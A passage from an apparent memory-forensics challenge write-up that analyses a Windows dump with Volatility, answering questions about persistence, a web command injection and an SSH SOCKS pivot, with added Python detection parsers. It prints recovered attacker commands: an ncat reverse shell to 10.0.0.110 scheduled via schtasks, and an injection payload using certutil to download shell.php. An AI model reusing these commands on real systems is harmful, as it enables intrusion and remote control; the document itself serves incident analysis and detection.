</span><b><span style="color: #fcff01;">4852 powershell.exe S-1-16-12288 High Mandatory Level</span></b></span></pre><div><br /></div></div></div></div><div><br /></div><div><div>Very disappointed that I still do not have enough concrete evidence to sell my case. However, there is still enough to take action. At this point, let's move forward with the challenge questions. We will find more evidence as we move along.</div><div><br /></div><div><b>Q:</b> What "Integrity Level" is this powershell.exe process at PID 4852 running with?</div><div><b>A:</b> PowerShell at 4852 is running with "High Mandatory Level"</div><div><br /></div><div><b>Q:</b> What "Integrity Level" is the VMWare process at PID 7164 running with?</div><div><b>A:</b> VMWare process at 7164 is running with "Medium Mandatory Level"</div><div><br /></div><div>Looking for persistence.</div><div><br /></div><div>Starting with the Registry Hives:</div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.registry.hivelist.HiveList > hivelist.txt</span></b><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div><div><b>Q:</b> How many entries were returned for the registry hive list?</div><div><b>A:</b> 42. Remember that the banner and column-header lines at the top of the file need to be removed before counting (the <i>sed '1,4d'</i> below drops them):</div></div><div><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat hivelist.txt | sed '1,4d' | wc --lines
42</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> How many programs seem to be configured to start when the computer starts up and the user logs in?</div><div><b>A:</b> Looking at the Run key, it seems to be 1. The same entry appears in two service-profile hives (LocalService and NetworkService), but it is one program. Note that printkey walks every hive it finds, so each loaded user hive's Run key is listed; the HKLM Run and RunOnce keys and the other autostart locations are worth checking the same way.</div><div><br /></div><div><b>Q:</b> What is the name of the program configured to start at login?</div><div><b>A:</b> It seems <i>OneDriveSetup.exe</i> is the only program configured to start at login.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows\CurrentVersion\Run"</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Last Write Time Hive Offset Type Key Name Data Volatile
...
2023-07-12 04:42:30.000000 0xb98420e97000 REG_SZ \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run OneDriveSetup "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup" False
2023-07-12 04:42:29.000000 0xb98421072000 REG_SZ \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run OneDriveSetup "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup" False</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Continuing the hunt for persistence. </div><div><br /></div><div>Earlier, we saw <i>ncat.exe</i> being used. Answer the following questions:</div><div><br /></div><div><b>Q:</b> What is the full path <i>ncat.exe</i> is being run from?</div><div><b>A:</b> <i>'c:\Program Files (x86)\Nmap\ncat.exe'</i></div><div><br /></div><div><b>Q:</b> Is <i>ncat.exe</i> being run from a "<i>normal user</i>" prompt or an "Administrator" prompt?</div><div><b>A:</b> <i>"Administrator"</i>. The console title recovered below starts with "Administrator: Command Prompt", the prefix cmd.exe adds to its window title when it runs elevated.</div><div><br /></div><div><b>Q:</b> What is the full command line of the ncat.exe being used to establish persistence?</div><div><b>A:</b><i> schtasks /create /TN sec504-DCA /TR "'c:\Program Files (x86)\Nmap\ncat.exe' '10.0.0.110 '443' '--ssl' '--exec cmd.exe'" /SC Daily /ST 02:00 /f</i></div><div><br /></div><div><b>Q:</b> Which Windows utility is being used to establish this persistence?</div><div><b>A:</b> schtasks.exe, the scheduled-task command-line tool: <i>/create</i> creates the task, <i>/TN</i> names it, <i>/TR</i> is the action to run, <i>/SC Daily</i> and <i>/ST 02:00</i> set the schedule, and <i>/f</i> silently overwrites an existing task of the same name.</div><div><br /></div><div>All of these questions can be answered from the output below.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "ncat" | sort --unique | grep 'schtask'
]0;Administrator: Command Prompt - schtasks /create /TN sec504-DCA /TR "'c:\Program Files (x86)\Nmap\ncat.exe' '10.0.0.110 '443' '--ssl' '--exec cmd.exe'" /SC Daily /ST 02:00 /f</span>
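</pre></div></div><div><br /></div></div><div><div>The scheduled-task command line above is worth pulling apart programmatically rather than by eye: a task whose action is a network tool given an IP address, a port and a shell to execute is exactly the pattern a detection for scheduled-task persistence (ATT&amp;CK T1053.005) keys on. The Python below is an added example for this write-up, not code from the original post or from Volatility. It parses the recovered line, console-title prefix included, and flags it; the list of shell-giving tool names is an assumption made for illustration.</div><div><br /></div></div>

```python
import re

# Command line recovered from the memory image with strings(1), exactly as it
# appears in the output above. The "]0;Administrator: Command Prompt - " prefix
# is the console window title cmd.exe emits, so the task line is found inside it.
SCHTASKS_LINE = (
    ']0;Administrator: Command Prompt - schtasks /create /TN sec504-DCA '
    '/TR "\'c:\\Program Files (x86)\\Nmap\\ncat.exe\' \'10.0.0.110 \'443\' '
    '\'--ssl\' \'--exec cmd.exe\'" /SC Daily /ST 02:00 /f'
)

# Assumed list (for illustration): programs that hand a shell to a remote party
# when they appear as a scheduled task action.
SHELL_TOOLS = ("ncat", "nc.exe", "netcat", "powershell", "cmd.exe", "mshta", "rundll32")

def parse_schtasks(cmdline):
    """Extract task name, action, schedule and start time from a
    'schtasks /create' command line. /TR is matched as one double-quoted group
    because, as above, it contains spaces and broken nested single quotes that a
    whitespace split would scatter."""
    lowered = cmdline.lower()
    if "schtasks" not in lowered or "/create" not in lowered:
        return None
    task = {}
    m = re.search(r'/TN\s+(\S+)', cmdline, re.I)
    task["name"] = m.group(1) if m else None
    m = re.search(r'/TR\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    if m:
        task["action"] = m.group(1) if m.group(1) is not None else m.group(2)
    else:
        task["action"] = ""
    m = re.search(r'/SC\s+(\S+)', cmdline, re.I)
    task["schedule"] = m.group(1) if m else None
    m = re.search(r'/ST\s+(\d{2}:\d{2})', cmdline, re.I)
    task["start"] = m.group(1) if m else None
    return task

def extract_endpoint(action):
    """First IPv4 address followed by a port in the action. The quoting in the
    recovered line is unreliable, so tokens are not trusted and a regex is used."""
    m = re.search(r'(\d{1,3}(?:\.\d{1,3}){3})\D+(\d{1,5})', action)
    return (m.group(1), int(m.group(2))) if m else None

def assess(cmdline):
    """Parse the line and add the indicators a detection would key on."""
    task = parse_schtasks(cmdline)
    if task is None:
        return None
    action_l = task["action"].lower()
    task["tool"] = next((t for t in SHELL_TOOLS if t in action_l), None)
    task["endpoint"] = extract_endpoint(task["action"])
    task["ssl"] = "--ssl" in action_l
    task["exec"] = "--exec" in action_l or " -e " in action_l
    # a shell tool pointed at host:port from a scheduled task is persistence
    task["suspicious"] = task["tool"] is not None and task["endpoint"] is not None
    return task

if __name__ == "__main__":
    for key, value in assess(SCHTASKS_LINE).items():
        print("%-10s %s" % (key, value))
```

<div><div><br /></div><div>assess() returns the task name, schedule and start time, the host and port it will call back to, and whether the action is TLS-wrapped and executes a program; the same function run over every schtasks line that strings(1) recovers is a quick way to triage all of them at once.</div><div><br /></div></div><div><div><div><pre>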
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What is the objective of this persistence mechanism?</div><div><b>A:</b> Every day at 02:00 the scheduled task runs ncat, which connects out to 10.0.0.110 on port 443 over SSL and hands the remote end a cmd.exe shell (<i>--exec cmd.exe</i>): a reverse shell that re-establishes itself daily, wrapped in TLS on a port that blends in with HTTPS traffic.</div><div><br /></div><div>IP 10.0.0.110 is becoming a prominent fixture throughout this incident, further evidence that we should be concerned about this host.</div><div><br /></div><div>Extract all ASCII strings.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: #fcff01;"><b>strings </b></span><span style="color: white;">SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">> strings.txt</span></b>
</pre></div></div><div><br /></div></div><div><div>Not to worry, I know I should also look at the other encodings via "<i>--encoding=[s|S|b|l|B|L]</i>" (Windows stores much of its text as UTF-16LE, which is <i>--encoding=l</i>, so a plain ASCII pass misses those strings). However, this is the approach I am taking for this challenge.</div><div><br /></div><div>There seems to be some interaction with the "upload" folder. </div><div><b>Q:</b> What is the name of the file uploaded? </div><div><b>A:</b> The uploaded file is "<i>shell.php</i>"</div><div><br /></div><div><b>Q:</b> What is the tool used to allow the threat actor to live off the land to "upload" one or more files?</div><div><b>A:</b> The living-off-the-land tool is "<i>certutil.exe</i>": its <i>-urlcache -f</i> option fetches a URL and writes it to a local path, which turns a signed Windows binary into a downloader.</div><div><br /></div><div><b>Q:</b> What type of vulnerability does it seem the threat actor was able to leverage?</div><div><b>A:</b> Command injection. The web form's <i>ip</i> parameter is handed to a shell: the recovered <i>cmd.exe /s /c "ping 127.0.0.1 & certutil ..."</i> line shows the application building a ping command from the parameter, so a "&" lets the attacker chain a second command onto it.</div><div><br /></div><div><b>Q:</b> What is the full command that was used to exploit this vulnerability?</div><div><b>A:</b> The submitted parameter, URL-decoded, was <i>127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php</i> (a second variant writes to "." instead), and the application executed it as <i>cmd.exe /s /c "ping 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ."</i>. Both the encoded form bodies and the decoded command lines are in the output below.</div><div><br /></div><div>The output below answers all the questions above.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">grep "10.0.0.110"</span></b><span style="color: white;"> strings.txt | </span><b><span style="color: #fcff01;">grep certutil</span></b><span style="color: white;">
.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=SubmitP
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
cmd.exe /s /c "ping 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ."
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit_
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit"M{
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.phppload%5Cshell.php+.&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit</span>
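</pre></div></div><div><br /></div></div><div><div>To see what the attacker actually submitted, the URL-encoded form bodies above have to be decoded and the injected part separated from the value the form expected. The Python below is an added example for this write-up, not code from the original post. It decodes the body with the standard library, splits each parameter on shell separators and recognises certutil's URL-cache download trick; the first two sample bodies are the strings recovered above, the third is a constructed benign submission so the rule has something to ignore.</div><div><br /></div></div>

```python
import re
from urllib.parse import parse_qs

# Form bodies recovered from the memory image; the first two are the strings
# shown above, the third is a constructed benign submission for comparison.
RECOVERED = [
    "ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php"
    "+..%5Cupload%5Cshell.php&Submit=Submit",
    "ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php"
    "+.&Submit=Submit",
    "ip=127.0.0.1&Submit=Submit",
]

# Shell separators that let a second command ride along with the intended one
# (cmd.exe honours & && | ||; a POSIX shell additionally honours ; ` and $( ).
META = re.compile(r'(\|\||&&|[;&|`]|\$\()')

def decode_body(body):
    """application/x-www-form-urlencoded body to {param: first value}; '+' is a space."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def injected_commands(value):
    """Split a parameter value on shell separators. re.split keeps the
    separators at odd indexes; the even-indexed pieces are commands, and
    everything after the first one is what the attacker appended."""
    pieces = [p.strip() for p in META.split(value)]
    commands = [p for i, p in enumerate(pieces) if i % 2 == 0 and p]
    return commands[1:]

def certutil_download(cmd):
    """Recognise certutil's URL-cache download trick: source URL and destination."""
    m = re.search(r'\bcertutil\b.*?-urlcache\s+(\S+)\s+(\S+)', cmd, re.I)
    return {"url": m.group(1), "dest": m.group(2)} if m else None

def triage(body):
    """Findings for one form body: which parameter carried an injection,
    its decoded value, the appended commands and any downloads they perform."""
    findings = []
    for name, value in decode_body(body).items():
        commands = injected_commands(value)
        if not commands:
            continue
        findings.append({
            "param": name,
            "decoded": value,
            "injected": commands,
            "downloads": [d for d in map(certutil_download, commands) if d],
        })
    return findings

if __name__ == "__main__":
    for body in RECOVERED:
        print(triage(body))
```

<div><div><br /></div><div>parse_qs splits only on the literal "&" between parameters, so the encoded %26 survives decoding as the injected separator inside the <i>ip</i> value. The server-side fix is the mirror image of this parser: validate the parameter as an IP address and invoke ping without a shell, rather than trying to filter metacharacters out of a string that is going to be passed to cmd.exe.</div><div><br /></div></div><div><div><div><pre>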
</pre></div></div><div><br /></div></div><div>Looking at the device tree (the "DeviceType" column):</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.devicetree.DeviceTree > devicetree.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> How many unique device types are seen within the memory dump?</div><div><b>A:</b> 29 unique device types. The pipeline below prints 30 lines, but one of them is an empty type, as explained under the output.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d' | wc --lines
30</span></pre></div></div><div><br /></div><div>The pipeline counts the last whitespace-delimited field of every line, data or not, so the result needs a manual correction: it reports 30, but one of those lines (the one with count 2 and an empty type) is not a device type, which leaves 29.</div><div><br /></div><div><b>Q: </b>What is/are the name(s) of the devices?</div><div><b>A:</b> See below</div></div><div><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d'
48 FILE_DEVICE_UNKNOWN
21 FILE_DEVICE_DISK
19 FILE_DEVICE_NETWORK
18 UNKNOWN
12 FILE_DEVICE_BUS_EXTENDER
9 FILE_DEVICE_MOUSE
9 FILE_DEVICE_DISK_FILE_SYSTEM
9 FILE_DEVICE_CONTROLLER
7 FILE_DEVICE_NETWORK_FILE_SYSTEM
5 FILE_DEVICE_KS
3 FILE_DEVICE_VIDEO
3 FILE_DEVICE_NAMED_PIPE
3 FILE_DEVICE_CD_ROM
2 FILE_DEVICE_NULL
2 FILE_DEVICE_MAILSLOT
2 FILE_DEVICE_ACPI
2
1 FILE_DEVICE_TRANSPORT
1 FILE_DEVICE_TAPE_FILE_SYSTEM
1 FILE_DEVICE_SOUND
1 FILE_DEVICE_SERIAL_PORT
1 FILE_DEVICE_SCREEN
1 FILE_DEVICE_PHYSICAL_NETCARD
1 FILE_DEVICE_NETWORK_BROWSER
1 FILE_DEVICE_KSEC
1 FILE_DEVICE_KEYBOARD
1 FILE_DEVICE_CD_ROM_FILE_SYSTEM
1 FILE_DEVICE_BEEP
1 FILE_DEVICE_BATTERY
1 FILE_DEVICE_8042_PORT</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> From the device tree, how many entries have a "<i>DriverName</i>" of HTTP and a "<i>DeviceName</i>" of "<i>ClientSession</i>"? (The DeviceTree columns are Offset, Type, DriverName, DeviceName, DriverNameOfAttDevice and DeviceType, so in the matching row below HTTP is the driver, ClientSession the device, and DriverNameOfAttDevice is N/A.)</div><div><b>A:</b> There is only 1 HTTP "<i>ClientSession</i>" device.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat devicetree.txt | grep --perl-regexp 'HTTP|ClientSession'
0xe78beff21e50 DRV HTTP N/A N/A N/A
* 0xe78beff21e50 DEV HTTP ClientSession N/A FILE_DEVICE_NETWORK</span>
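</pre><div><br /></div></div></div><div><br /></div></div><div><div>The awk pipeline used for the device-type count takes the last field of every line, banner, header and DRV rows included, which is why the total had to be corrected by hand. As an added example for this write-up (not part of the original post or of Volatility), the Python below parses DeviceTree output on the assumption that its columns are whitespace-separated and that no driver or device name contains whitespace, counts DeviceType over device rows only, and answers the HTTP/ClientSession question from the same parsed rows. Apart from the two HTTP rows recovered above, the sample rows are constructed.</div><div><br /></div></div>

```python
from collections import Counter

# Constructed excerpt in the shape of 'windows.devicetree.DeviceTree' output.
# The two HTTP rows are the ones recovered above; the rest are made up so the
# parser meets a banner, a progress line, a header, a blank line and DRV/DEV/ATT rows.
SAMPLE = """Volatility 3 Framework 2.5.2
Progress:  100.00\t\tPDB scanning finished
Offset\tType\tDriverName\tDeviceName\tDriverNameOfAttDevice\tDeviceType

0xe78beff21e50\tDRV\tHTTP\tN/A\tN/A\tN/A
* 0xe78beff21e50\tDEV\tHTTP\tClientSession\tN/A\tFILE_DEVICE_NETWORK
0xe78bf0000010\tDRV\t\\Driver\\Null\tN/A\tN/A\tN/A
* 0xe78bf0000020\tDEV\t\\Driver\\Null\tNull\tN/A\tFILE_DEVICE_NULL
0xe78bf0000030\tDRV\t\\Driver\\Disk\tN/A\tN/A\tN/A
* 0xe78bf0000040\tDEV\t\\Driver\\Disk\tDR0\tN/A\tFILE_DEVICE_DISK
** 0xe78bf0000050\tATT\t\\Driver\\partmgr\tN/A\t\\Driver\\Disk\tFILE_DEVICE_DISK
* 0xe78bf0000060\tDEV\t\\Driver\\Disk\tDR1\tN/A\tFILE_DEVICE_DISK
"""

COLUMNS = ("offset", "kind", "driver", "device", "attached_to", "device_type")

def parse_rows(text):
    """Data rows as dicts. Assumption: columns are whitespace-separated and no
    driver or device name contains whitespace; a row that breaks that is
    reported instead of being miscounted silently."""
    rows = []
    for line in text.splitlines():
        tokens = line.split()
        # child rows are prefixed with a depth marker: "*", "**", ...
        while tokens and set(tokens[0]) == {"*"}:
            tokens.pop(0)
        if not tokens or not tokens[0].startswith("0x"):
            continue  # banner, progress, header or blank line
        if len(tokens) != len(COLUMNS):
            raise ValueError("unexpected column count: %r" % line)
        rows.append(dict(zip(COLUMNS, tokens)))
    return rows

def device_type_counts(rows):
    """DeviceType counts over device rows (DEV and ATT) only; DRV rows carry
    N/A in that column and would otherwise show up as a bogus type."""
    return Counter(r["device_type"] for r in rows if r["kind"] in ("DEV", "ATT"))

def find_devices(rows, driver=None, device=None):
    """Device rows filtered by DriverName and/or DeviceName."""
    return [r for r in rows if r["kind"] in ("DEV", "ATT")
            and (driver is None or r["driver"] == driver)
            and (device is None or r["device"] == device)]

if __name__ == "__main__":
    rows = parse_rows(SAMPLE)
    counts = device_type_counts(rows)
    print(len(counts), "unique device types:", counts.most_common())
    print(find_devices(rows, driver="HTTP", device="ClientSession"))
```

<div><div><br /></div><div>Feed it the real devicetree.txt instead of SAMPLE and len(device_type_counts(rows)) is the answer with no trimming of header or blank lines; if a driver name with a space ever breaks the whitespace assumption, the ValueError says which row did it rather than shifting the columns.</div><div><br /></div></div><div><div><div><pre>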
</pre><div><br /></div></div></div><div><br /></div></div><div><div>In the list of ESTABLISHED network sessions, we also saw an SSH connection:</div><div><br /></div><div><b>Q:</b> What does the SSH manpage say about <i>"-D"</i>?</div><div><b>A:</b> The ssh manpage lists it as <i>-D [bind_address:]port</i>: "dynamic" application-level port forwarding, where ssh listens on the local port and acts as a SOCKS server, forwarding every connection made to it out through the SSH session.</div><div><br /></div><div>The bind address is optional, and when it is omitted the listener is bound to the loopback interface only. Since we already know the port, we can assume it is listening on <i>127.0.0.1</i> at a minimum. Let's test that theory.</div><div><br /></div><div><b>Q:</b> What is the full path(s) of the SSH "<i>known_hosts</i>" file on this system:</div><div><b>A: </b>Two users have a <i>.ssh</i> directory with known_hosts files, <i>administrator.SECURITYNIK-WIN</i> and <i>securitynik</i>, as the strings output below shows.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">strings --all SECURITYNIK-WIN-20231116-235706.dmp | </span><span style="color: #fcff01;"><b>grep "known_hosts"</b></span><span style="color: white;"> | sort --unique
4known_hosts (C:\Users\administrator.SECURITYNIK-WIN\.ssh)
4known_hosts (C:\Users\securitynik\.ssh)
*!C:\Users\administrator.SECURITYNIK-WIN\.ssh\known_hosts.old
!C:\Users\securitynik\.ssh\known_hosts
C:\Users\securitynik/.ssh/known_hosts
C:\Users\securitynik/.ssh/known_hosts2
!C:\Users\securitynik\.ssh\known_hosts.old</span>
</pre></div></div><div><br /></div><div>We can also see that it seems SSH was being used as a local "dynamic" (SOCKS) proxy. </div><div>We learned this above, so this is just reinforcement of our knowledge. </div><div>Anything pointed at the local port is relayed through the SSH session and leaves from the remote host, so this is a way to proxy or pivot traffic. </div><div><br /></div><div><b>Q:</b> What is the command line, local port, username and remote IP address that SSH proxy connection is using?</div><div><b>A</b>: Command line <i>ssh -D 9999 kali@10.0.0.110 -N -vvv</i>; local port 9999; username <i>kali</i>; remote IP 10.0.0.110.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">strings --all SECURITYNIK-WIN-20231116-235706.dmp | </span><b><span style="color: #fcff01;">grep --perl-regexp 'ssh\s+\-D'</span></b><span style="color: white;">
ssh -D 9999 kali@10.0.0.110 -N -vvv
]0;Administrator: Windows PowerShell - ssh -D 9999 kali@10.0.0.110 -N -vvv</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What does the "-N" do in the identified command?</div><div><b>A:</b> "Do not execute a remote command. This is useful for just forwarding ports" (and <i>-vvv</i> is maximum debug verbosity).</div><div><br /></div><div><b>Q:</b> Is the PowerShell prompt running as a "normal user" or "Administrator" ?</div><div><b>A:</b> "Administrator": the recovered console title reads "Administrator: Windows PowerShell - ssh ...".</div><div><br /></div><div><b>Q:</b> What is the application that seems to be connecting to the local "dynamic" proxy?</div><div><b>A:</b> chrome.exe, launched with <i>--proxy-server="socks5://127.0.0.1:9999"</i> as shown below.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">strings --all SECURITYNIK-WIN-20231116-235706.dmp | </span><b><span style="color: #fcff01;">grep "chrome"</span></b><span style="color: white;"> | </span><span style="color: #fcff01;"><b>grep "127.0.0.1:9999"</b></span><span style="color: white;">
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --proxy-server=socks5://127.0.0.1:9999 --mojo-platform-channel-handle=2144 --field-trial-handle=1868,i,3512365481249750963,10747349760151142710,262144 /prefetch:8
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
chrome.exe --proxy-server="socks5://127.0.0.1:9999"</span>
</pre></div></div><div><br /></div></div><div><div>Staying with port 9999 a bit longer: what else is going on there?</div><div><br /></div><div>At the same time, we saw port 443 earlier. Let's see what we can find for these two ports. Note that the hits below are for <i>10.0.0.108</i>, a second host of interest distinct from the 10.0.0.110 SSH endpoint, serving files over HTTP on port 9999.</div><div><br /></div><div><b>Q: </b>What was/were the name of the file(s) downloaded from <i>http://10.0.0.108:9999</i>?</div><div><b>A:</b> It looks like <i>putty_64.exe</i>, <i>putty_x64.exe, putty.exe</i> and <i>putty_x64.md5.txt</i> were all downloaded. </div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
